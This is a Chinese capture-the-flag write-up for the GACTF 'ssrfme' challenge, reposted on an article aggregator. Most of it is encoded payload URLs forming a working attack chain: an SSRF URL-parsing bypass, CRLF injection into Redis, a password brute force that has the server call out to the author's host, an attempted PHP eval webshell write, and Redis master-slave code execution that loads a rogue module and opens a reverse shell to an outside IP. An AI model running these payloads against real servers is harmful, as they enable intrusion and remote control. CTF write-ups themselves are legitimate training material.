GACTF之ssrfme

时间  2020-12-01
标签 php python git github web redis shell 安全 bash 服务器 栏目 PHP 繁體版
原文   原文链接

点击蓝字 ·  关注咱们php

01python

绕过url解析git


http://121.36.199.21:10802/?url=http://root:root@127.0.0.1:5000@baidu.com/&rid=2&pid=1&title=


02github

爆破内部端口web



03redis

存在注入shell



发现第二个web是urllib 对应版本存在CRLF注入 
http://121.36.199.21:10802/?url=http://root:root@127.0.0.1:5000@baidu.com/?url=http://123.56.22.0:999


03安全

爆破bash

爆破发现存在redis端口 6379,可是密码怎么都不对,结合题目说的提示推测多是安全机制。 
http://121.36.199.21:10802/?url=http://root:root@127.0.0.1:5000@baidu.com/?url=http://123.56.22.0:6378?%250D%250Aauth%2520123123%250D%250Ainfo%250D%250A1
服务器搭建测试 直接提交 有安全机制

可是若是发送 
http://121.36.199.21:10802/?url=http://root:root@127.0.0.1:5000@baidu.com/?url=http://123.56.22.0:6378?%250D%250Aauth%2520123123%250D%250Aset%2520A%2520evil%250D%250A
服务器无回显 可是A已经被设置为evil了 因此就不用管 先搞密码

爆破redis密码我是用的主历来作的,当密码正确会链接到个人vps服务器

http://121.36.199.21:10802/?url=http://root:root@127.0.0.1:5000@baidu.com/?url=http://123.56.22.0:6377?%250D%250Aauth%2520123123%250D%250Aslaveof%2520123.56.22.0%25202323%250D%250A1

redis密码123456



04

shell 失败尝试主从rce

写shell失败 多是无权限 就不考虑计划任务了

http://121.36.199.21:10802/?url=http://root:root@127.0.0.1:5000@baidu.com/?url=http://123.56.22.0:6377?%250D%250Aauth%2520123123%250D%250Aset%2520A%2520%2520%253C%253Fphp%253b%2540eval%2528%2524_POST%255Bc%255D%2529%253B%253F%253E%250A%250D%250A%250D%250A%250d%250aconfig%2520set%2520dir%2520/tmp%250d%250aconfig%2520set%2520dbfilename%2520suanve.php%250d%250asave%250d%250apadding


尝试主从rce

参考https://blog.csdn.net/weixin_43610673/article/details/106457180

使用工具

https://github.com/xmsec/redis-ssrf

执行脚本不停的监听

while [ "1" = "1" ]do python rogue-server.pydone


05

三次请求&反弹拿flag

准备好之后nc监听6663端口 依次发送三次请求

  

0x01 设置tmp目录


http://121.36.199.21:10804/?url=http://root:root@127.0.0.1:5000@baidu.com/?url=http://127.0.0.1:6379?%250D%250Aauth%2520123456%250d%250aconfig%2520set%2520dir%2520%252ftmp%250d%250a1



0x02 设置exp.so

http://121.36.199.21:10804/?url=http://root:root@127.0.0.1:5000@baidu.com/?url=http://127.0.0.1:6379?%250D%250Aauth%2520123456%250d%250aconfig%2520set%2520dbfilename%2520exp.so%250d%250aslaveof%2520123.56.22.0%25206666%250d%250aquit%250a1



0x03 加载so后执行反弹命令

http://121.36.199.21:10804/?url=http://root:root@127.0.0.1:5000@baidu.com/?url=http://127.0.0.1:6379?%250D%250Aauth%2520123456%250d%250amodule%2520load%2520%252ftmp%252fexp.so%250d%250asystem.rev%2520123.56.22.0%25206663%250d%250aquit%250d%250a1


服务器收到三次请求



反弹拿到shell


GACTF{to0_t0o_easy_SSRF101_1ace2020}


EDI安全

扫二维码|关注咱们

一个专一渗透实战经验分享的公众号

本文分享自微信公众号 - WhITECat安全团队(WhITECat_007)。
若有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一块儿分享。

相关文章
相关标签/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公众号
   欢迎关注本站公众号,获取更多信息
联系我们 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程